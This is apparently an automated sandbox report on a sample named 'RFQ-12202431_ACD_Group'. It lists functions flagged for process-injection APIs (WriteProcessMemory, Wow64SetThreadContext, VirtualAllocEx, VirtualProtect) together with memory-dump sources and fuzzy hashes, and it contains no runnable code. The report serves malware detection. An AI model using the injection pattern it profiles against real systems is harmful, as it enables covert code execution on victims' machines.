Instruction ID: a87524b8e4d604606f2694f75b9cd168ed0ae2c9486d55a908ce6be7178fc748
Opcode Fuzzy Hash: 5464b388d0b8cb87abb1715adfa9147c0b44057f042e6e2926ca3777bdca7f75
Instruction Fuzzy Hash: 882148718043488FCB51EF68C8407EEBFF1EF85310F15845ED8949B262CA355949CF62

Function 06B057A0 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06B05838

Memory Dump Source

Source File: 00000000.00000002.1795331756.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b00000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 14ff589e8c72f89c1459e7e5ebeb10bc8d6d3684ad82143eefd8a2f8b916a7db
Instruction ID: 91eb658c84f2e254300bbab46cd37917cab65aa6d81d111e2bacf91f49d50b62
Opcode Fuzzy Hash: 14ff589e8c72f89c1459e7e5ebeb10bc8d6d3684ad82143eefd8a2f8b916a7db
Instruction Fuzzy Hash: 5B2133B29003499FDB10CFA9C984BEEBFF5FB48314F10842AE958A7250C7789955CFA4

Function 06A5CE11 Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 06A5CE87

Memory Dump Source

Source File: 00000000.00000002.1795041376.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 4798b0785b860f4e12fcce630ed50db5baded0d941de528f560883a35f3484c8
Instruction ID: 92d6c92dffb0396ce962bea4859cb28cb807e1797e3eb732b4c183d98db49029
Opcode Fuzzy Hash: 4798b0785b860f4e12fcce630ed50db5baded0d941de528f560883a35f3484c8
Instruction Fuzzy Hash: 58219DB19003598FCB10DFAAC841AEFFFF8EF89324F10841ED449A7250DA359944CBA5

Function 06B057A8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06B05838

Memory Dump Source

Source File: 00000000.00000002.1795331756.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b00000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e31ea3c7b096c32a832f82c3b32e3af2e8f37f3b83a6bcf0d4dfcdf1eaf3add9
Instruction ID: 9e0d5301e9ebfc00fe818c59f259e759bf3f0877fbb1ff16ff4e29d75ba72db6
Opcode Fuzzy Hash: e31ea3c7b096c32a832f82c3b32e3af2e8f37f3b83a6bcf0d4dfcdf1eaf3add9
Instruction Fuzzy Hash: 4B2135B29003499FDB10CFAAC980BDEBFF5FB48310F108429E958A7240C7789944CFA4

Function 06B05EB3 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06B05F36

Memory Dump Source

Source File: 00000000.00000002.1795331756.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b00000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 37ba2ab3ae620db942a442d8adcb951ebff08920b2096c0c96b5d5f514e8ec2a
Instruction ID: 0c50e4384b57bdccab678b7c899329dbc819b784c92f68689eb179b903bcf522
Opcode Fuzzy Hash: 37ba2ab3ae620db942a442d8adcb951ebff08920b2096c0c96b5d5f514e8ec2a
Instruction Fuzzy Hash: 9A2137B2D002098FDB10DFA9C5857EEBFF4EF48314F64842AD459A7281C7789985CFA4

Function 06B05EB8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06B05F36

Memory Dump Source

Source File: 00000000.00000002.1795331756.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b00000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: abbd5a6a03ee36e4a841e181d006e94bbfb3d137cd7d1ccfb0222377dbb7c376
Instruction ID: ea4e58891a569b53c403048f16c5eb3a3efe5ca6faf884a5ea797156dc5c1b00
Opcode Fuzzy Hash: abbd5a6a03ee36e4a841e181d006e94bbfb3d137cd7d1ccfb0222377dbb7c376
Instruction Fuzzy Hash: 532107B2D002098FDB10DFAAC585BEEBFF4EB48324F548429D459A7281C778A945CFA5

Function 06A5DF38 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 06A5DFB4

Memory Dump Source

Source File: 00000000.00000002.1795041376.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e04e7e3ca2c4ed4e3eb360a6abaa7256b84a67e39cf93cf3f05c84e7527e217b
Instruction ID: 66ad346d9d87c460e987805b51785fd289cefb562921bb01cc46faedd3ba4bc2
Opcode Fuzzy Hash: e04e7e3ca2c4ed4e3eb360a6abaa7256b84a67e39cf93cf3f05c84e7527e217b
Instruction Fuzzy Hash: 7A2134B190424A8FDB10DFAAC984BEEFBF0AF48320F14842AD499A7251C7789545CFA5

Function 068105D8 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 06810654

Memory Dump Source

Source File: 00000000.00000002.1793926859.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6810000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e0b34782bc444556368cd40c688f93df6dc079c6d2cacbc302470b8cf1bfff28
Instruction ID: fa663f2376daf9cb3917bee695d86eec9935ce5218a0678fab9911f974a256eb
Opcode Fuzzy Hash: e0b34782bc444556368cd40c688f93df6dc079c6d2cacbc302470b8cf1bfff28
Instruction Fuzzy Hash: 922127B1D002498FCB10DFAAD844AEEFBF4FF88310F108429D559A7210C7759985CFA4

Function 06A5DF40 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 06A5DFB4

Memory Dump Source

Source File: 00000000.00000002.1795041376.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d4c1c3762c903b98e6f09cfaeffb8692ad58663d5c52f8f6686c841cddc19d2e
Instruction ID: 28c8a8b2cfac494f7bc10c8b2bb50c80c9246589bce1d6ccbb6dfc79243bab66
Opcode Fuzzy Hash: d4c1c3762c903b98e6f09cfaeffb8692ad58663d5c52f8f6686c841cddc19d2e
Instruction Fuzzy Hash: 8B2127B1C002498FDB10DFAAC444BEEFBF4EF48320F108429D459A7250CB78A545CFA5

Function 06B064B0 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06B06526

Memory Dump Source

Source File: 00000000.00000002.1795331756.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b00000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8b92947faa6f92def06b367b8238c8316cacc69d78752f56e5eb78ff9e613e8c
Instruction ID: de3cb6edaeed67837ed24792c2398e85279b1e221beff9ec972cd158840d57be
Opcode Fuzzy Hash: 8b92947faa6f92def06b367b8238c8316cacc69d78752f56e5eb78ff9e613e8c
Instruction Fuzzy Hash: E11189B29002489FCB10DFAAC844BDEBFF5EB48320F208819E519A7250C735A550CFA0

Function 068105DE Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 06810654

Memory Dump Source

Source File: 00000000.00000002.1793926859.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6810000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 30aaa38dfa995fd013e157109ec06a785f55e5f9c41c780e4c0840d346ba7230
Instruction ID: 956ca0c364d9afd1418cfaadcead54a703af5e0eea2ea9c6422b9677abdfe9be
Opcode Fuzzy Hash: 30aaa38dfa995fd013e157109ec06a785f55e5f9c41c780e4c0840d346ba7230
Instruction Fuzzy Hash: 0821E5B1D003499FCB10DFAAC844A9EFBF4EF88324F148429D559A7250C775A944CFA5

Function 068105E0 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 06810654

Memory Dump Source

Source File: 00000000.00000002.1793926859.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6810000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 41ff73ee9449982544efb99a718454aedd8868729734232d45c489fbd4b08195
Instruction ID: a09b11bfcb761af941b0808ddfce98852e112162d88bfd1833b2fc8334866eab
Opcode Fuzzy Hash: 41ff73ee9449982544efb99a718454aedd8868729734232d45c489fbd4b08195
Instruction Fuzzy Hash: 7E11F7B1D003499FCB10DFAAC844ADEFBF4EF88324F108429D559A7250C7759944CFA5

Function 06A5CE18 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 06A5CE87

Memory Dump Source

Source File: 00000000.00000002.1795041376.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 09be91c96cc212ae56383610d06e2c08f78b859d6cde151d4ddda5df1a51fe07
Instruction ID: 9e2fcebd82a35ae130c8d2dd29455fc058692b1dac1ce6037d6b06a844af3034
Opcode Fuzzy Hash: 09be91c96cc212ae56383610d06e2c08f78b859d6cde151d4ddda5df1a51fe07
Instruction Fuzzy Hash: 01114CB1D003598FDB10DFAAC445BEFFFF8AB49324F14841AD459A7254C6399944CBA4

Function 06B064B8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06B06526

Memory Dump Source

Source File: 00000000.00000002.1795331756.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b00000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d5d2ea5c9ce6216cb286e2b260ceb3528b53eb2cf64e3d9ade04a00944c237b8
Instruction ID: 9f04eb6ca364693f8065cbe717552e6711f68b61a41e7b0e0ed404c03c8082a9
Opcode Fuzzy Hash: d5d2ea5c9ce6216cb286e2b260ceb3528b53eb2cf64e3d9ade04a00944c237b8
Instruction Fuzzy Hash: 221153B28002498FCB10DFAAC844BDEBFF5EB88320F208819E559A7250C735A954CFA4

Function 068FD2B0 Relevance: 1.5, Strings: 1, Instructions: 289COMMON

Download Yara Rule

Strings

,bq, xrefs: 068FD63B

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: ,bq
API String ID: 0-2474004448
Opcode ID: 18d9f446aba0558c823252b3fc849989f607115f7b9e49542f9563a9bbc8b5d3
Instruction ID: 393477d550501ac3f64fc0bde1137e869bd39316542e713f3d2ea15f96ad595f
Opcode Fuzzy Hash: 18d9f446aba0558c823252b3fc849989f607115f7b9e49542f9563a9bbc8b5d3
Instruction Fuzzy Hash: A9C16E70A102288FDB54CB68C950BDDBBF6BF88700F158099E609EB365CA35DD85CFA1

Function 02AC99A1 Relevance: 1.5, Strings: 1, Instructions: 248COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02AC9DD5

Memory Dump Source

Source File: 00000000.00000002.1781424843.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 8922826b7e751ae9c10bb7488a790cef07cbbfafa1c94f3ee444bbac9909e1b5
Instruction ID: 4c0dee8bb8141d6cd70bf4cf238084913f7b40811ce087c32293d8432070feb4
Opcode Fuzzy Hash: 8922826b7e751ae9c10bb7488a790cef07cbbfafa1c94f3ee444bbac9909e1b5
Instruction Fuzzy Hash: 4AD1D8B4E4532ACFDB24CF29C9487A9B7B1BB4A305F2041EAD44AA3641DB755EC1CF42

Function 068FC3D8 Relevance: 1.5, Strings: 1, Instructions: 227COMMON

Download Yara Rule

Strings

4'^q, xrefs: 068FC602

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: eae6a4ce08d227b7552b5f5a81b889dae009bb0cc63947c0dceb5fc41a1844fd
Instruction ID: 480c4511f346d0a9a054a62de42b61837dc26bd812f76640b7663758fd5d3bb4
Opcode Fuzzy Hash: eae6a4ce08d227b7552b5f5a81b889dae009bb0cc63947c0dceb5fc41a1844fd
Instruction Fuzzy Hash: 2FA12E34A10218DFCB44DFA8D9989AEB7B2FF88300F118159EA05AB365DB34ED46CF41

Function 02AC0868 Relevance: 1.5, Strings: 1, Instructions: 226COMMON

Download Yara Rule

Strings

Te^q, xrefs: 02AC0A5C

Memory Dump Source

Source File: 00000000.00000002.1781424843.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 440f74b67b3260410b35d8feff8f5b244a2b75eede08bead2d9291e7ca27e645
Instruction ID: ec5c874d73cf7772e5c73a28ccd94efb9b58334cdfc28a54c40c7c79a917afca
Opcode Fuzzy Hash: 440f74b67b3260410b35d8feff8f5b244a2b75eede08bead2d9291e7ca27e645
Instruction Fuzzy Hash: D781CD347002049FC704EB68D598B6EBBF6FF89714F2484AAE449DB3A5DB35AC05CB91

Function 068F3030 Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

(bq, xrefs: 068F30A4

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 02d1eafa83865527231e7e4c508d1dcaba9081d4575914018b0d31e79fe51685
Instruction ID: 153403a1fb50c7436ce7c66f2496baa6c8daec605eb6449362dcf02324a213c9
Opcode Fuzzy Hash: 02d1eafa83865527231e7e4c508d1dcaba9081d4575914018b0d31e79fe51685
Instruction Fuzzy Hash: 8251C531A116168FCB10DF69C88496EFBB5FF89320B1586A6EA15DB342D730F895CBD0

Function 068F2070 Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

pbq, xrefs: 068F2120

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: pbq
API String ID: 0-3896149868
Opcode ID: a42e3ac63c4cf85b3bcc99a378d9d3c40aab61816c4a7a4c4eef69fcc6f96cab
Instruction ID: 22406e5f92c5aab9dab38335aec501fb5ed0a382a1c787a9428035e1b721ec9f
Opcode Fuzzy Hash: a42e3ac63c4cf85b3bcc99a378d9d3c40aab61816c4a7a4c4eef69fcc6f96cab
Instruction Fuzzy Hash: 33516E76600104AFCB459FA8C914D5ABBF7FF8D3147168498E249CB376DA36DC22EB50

Function 068FB408 Relevance: 1.4, Strings: 1, Instructions: 136COMMON

Download Yara Rule

Strings

4'^q, xrefs: 068FB4A1

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 2ccded943c98f798a8ba9b0b6b963d6c3a6700bee66e566a071a67e506fe37e6
Instruction ID: 6b0178bf0cc4cf72c39472fed03c61dabd3eab67b7054101c35596b7636d0d5a
Opcode Fuzzy Hash: 2ccded943c98f798a8ba9b0b6b963d6c3a6700bee66e566a071a67e506fe37e6
Instruction Fuzzy Hash: A641DF327003059FCB05AF68D85495EBBA7EF88320B04847AEB0ADB365CA35DC46CB91

Function 0690FC08 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0690FC42

Memory Dump Source

Source File: 00000000.00000002.1794585967.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6900000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 36e181a87e0b74c948ab9a120c0c047d119d71075d99c501fc0c29e8d7ccf464
Instruction ID: 51fd995a02fb63387a09ea71d756f21a10801b0f4982af58af6e8691fa2c6e57
Opcode Fuzzy Hash: 36e181a87e0b74c948ab9a120c0c047d119d71075d99c501fc0c29e8d7ccf464
Instruction Fuzzy Hash: D9418730B206158FCB94EB68C894A7E77BBAFC9700F104419E612EB394DF749D46DB92

Function 068FFA80 Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

4'^q, xrefs: 068FFB37

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 6a83ce581ddd0b20cc49c3f7f280d4f620458b25d95a36b713866df9ecd3d7c0
Instruction ID: 925591050024e4451ce90bfeb277449c0e57b87b665d40c4a7884b21701d76b5
Opcode Fuzzy Hash: 6a83ce581ddd0b20cc49c3f7f280d4f620458b25d95a36b713866df9ecd3d7c0
Instruction Fuzzy Hash: EA416D313402109FD349DB29C868B2E7BE6AF89704F104869E246CF3A5DE75EC42C791

Function 068FFA90 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

4'^q, xrefs: 068FFB37

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 4dbce3c71445bb571010c602f9ad388696722a84cfc07c028359f21c105ec246
Instruction ID: 7f3ad14dc597e84e78c3eb1cb5f28546304250381aaf6ddc1741a09810adaa15
Opcode Fuzzy Hash: 4dbce3c71445bb571010c602f9ad388696722a84cfc07c028359f21c105ec246
Instruction Fuzzy Hash: 1B314B357406149FD348EB69C9A8B2E77E6AB8C704F104868E306CB3A5DE75EC42CB91

Function 068FB458 Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

4'^q, xrefs: 068FB4A1

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 1196fde468e86d49adfe01e771bdb7063451779c008c36d0d3067a452e2d8cb7
Instruction ID: 01d94e580d05ab76c529146954fb782be9a8ee7e3ef633bf2c604ad2e6819dbd
Opcode Fuzzy Hash: 1196fde468e86d49adfe01e771bdb7063451779c008c36d0d3067a452e2d8cb7
Instruction Fuzzy Hash: F8318F32600215DFCB159FA4C85499EBBB7FF8C310B1540A9EB0A9B365CA75DC52CB91

Function 068F2E9B Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

W, xrefs: 068F2EA5

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: 875163410beb30908844fa76e2add66c37d51645a470a45cfb8d06dc6c8c5c87
Instruction ID: c3f1c8b5f3e8775e14fbb386d1bd15706e184624a3564baf626a5683efda6306
Opcode Fuzzy Hash: 875163410beb30908844fa76e2add66c37d51645a470a45cfb8d06dc6c8c5c87
Instruction Fuzzy Hash: 5F319C35A11209DFCB14CFA8E894A9EBBF5EF88310F20416AFA05E7361CB709D04CB90

Function 068F6B6F Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

p<^q, xrefs: 068F6BBA

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: p<^q
API String ID: 0-1680888324
Opcode ID: 2f7389a4145e74ebeaea330bd34add96a3f8e15d1445860520a1e234a5c9e94d
Instruction ID: 815cf5a9a859acb11d5bc7bfc562e4608aa38f2ee2dfce148d69a003e49434c7
Opcode Fuzzy Hash: 2f7389a4145e74ebeaea330bd34add96a3f8e15d1445860520a1e234a5c9e94d
Instruction Fuzzy Hash: AF217F717042449FCB56CF2AC840AAA7FF6FF8A200B194596FA85CB372D635DC91CB60

Function 068F6B80 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

p<^q, xrefs: 068F6BBA

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: p<^q
API String ID: 0-1680888324
Opcode ID: 321b98d5eefb759e13784d56da4db59ce99ab6f2ea5df48f5e833d503ec4220e
Instruction ID: a4217eb4b1efab07fd568193bb8e7d300fe86b5c8641c8970388711dd4d561d4
Opcode Fuzzy Hash: 321b98d5eefb759e13784d56da4db59ce99ab6f2ea5df48f5e833d503ec4220e
Instruction Fuzzy Hash: 3B215E717041549FCB55CF2AC880AAA7BEAFF89304F094595FE54CB361DA35DC91CB60

Function 068115C0 Relevance: 1.3, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 06811633

Memory Dump Source

Source File: 00000000.00000002.1793926859.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6810000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fa04c45c8ac035decad30fb302739aaec9cdadd5b9687213e29b6896cd64d1f3
Instruction ID: a2caa2ba27e393260d58b2ecfbcd86f41282418a696facd806b8dd44448a4b65
Opcode Fuzzy Hash: fa04c45c8ac035decad30fb302739aaec9cdadd5b9687213e29b6896cd64d1f3
Instruction Fuzzy Hash: E11159B1900248CFCB10DFAAC844BEEBFF9AB88314F248419D659AB250C735A545CF94

Function 068115C8 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 06811633

Memory Dump Source

Source File: 00000000.00000002.1793926859.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6810000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ef336d981d595af859e60d0935c901fe49ecb1f4d2d4dd3a6ab1a3ac475e7df8
Instruction ID: 4d58def9d2ff4aa8346a4fd01233e112f809358b7fc4d1ea87c4d93246894394
Opcode Fuzzy Hash: ef336d981d595af859e60d0935c901fe49ecb1f4d2d4dd3a6ab1a3ac475e7df8
Instruction Fuzzy Hash: B81134B19002488FCB10DFAAC844BDEFBF9EB88324F248419D559A7250CB75A584CFA4

Function 068FF5C3 Relevance: 1.3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

Strings

W, xrefs: 068FF5CD

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: 9149b647203f5423e80f76a95f0b452f70bb20f4c0d2f7e966e4a7190d17ad18
Instruction ID: c9580fafc50be73d3ab037d7deeda9efd767cf7af67d596ab6c9ecbe1419ecc9
Opcode Fuzzy Hash: 9149b647203f5423e80f76a95f0b452f70bb20f4c0d2f7e966e4a7190d17ad18
Instruction Fuzzy Hash: F701B135300740CFC306AB24D464A5EBBA3EF8D711B10459AEA4ACB3A5CB35DC42CB91

Function 02AC8A76 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

=, xrefs: 02AC8AC9

Memory Dump Source

Source File: 00000000.00000002.1781424843.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: =
API String ID: 0-2322244508
Opcode ID: fc6cbeddf67c6c8a243bdac246197930071da330f5083e814165f2008084cd1e
Instruction ID: 51f29d505942d5a8655f33b9f54b6f3d9e4fb62007f70ccdafc4026e0df90e7e
Opcode Fuzzy Hash: fc6cbeddf67c6c8a243bdac246197930071da330f5083e814165f2008084cd1e
Instruction Fuzzy Hash: 23F03A7480526DCFDB61DF14D8847E8B7B5BB41314F2445DBCC55A3181CB754AA9CF40

Function 02AC8DB9 Relevance: 1.3, Strings: 1, Instructions: 19COMMON

Download Yara Rule

Strings

5, xrefs: 02AC8E02

Memory Dump Source

Source File: 00000000.00000002.1781424843.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-2226203566
Opcode ID: a6287bec29eae1cbb20698d90191d0d77dca91d64321462e37e2c1607b61e8b5
Instruction ID: 4b4150b6f3986a5ac3a763f9d306f17867c78782af1c94cc4b8132820e2693aa
Opcode Fuzzy Hash: a6287bec29eae1cbb20698d90191d0d77dca91d64321462e37e2c1607b61e8b5
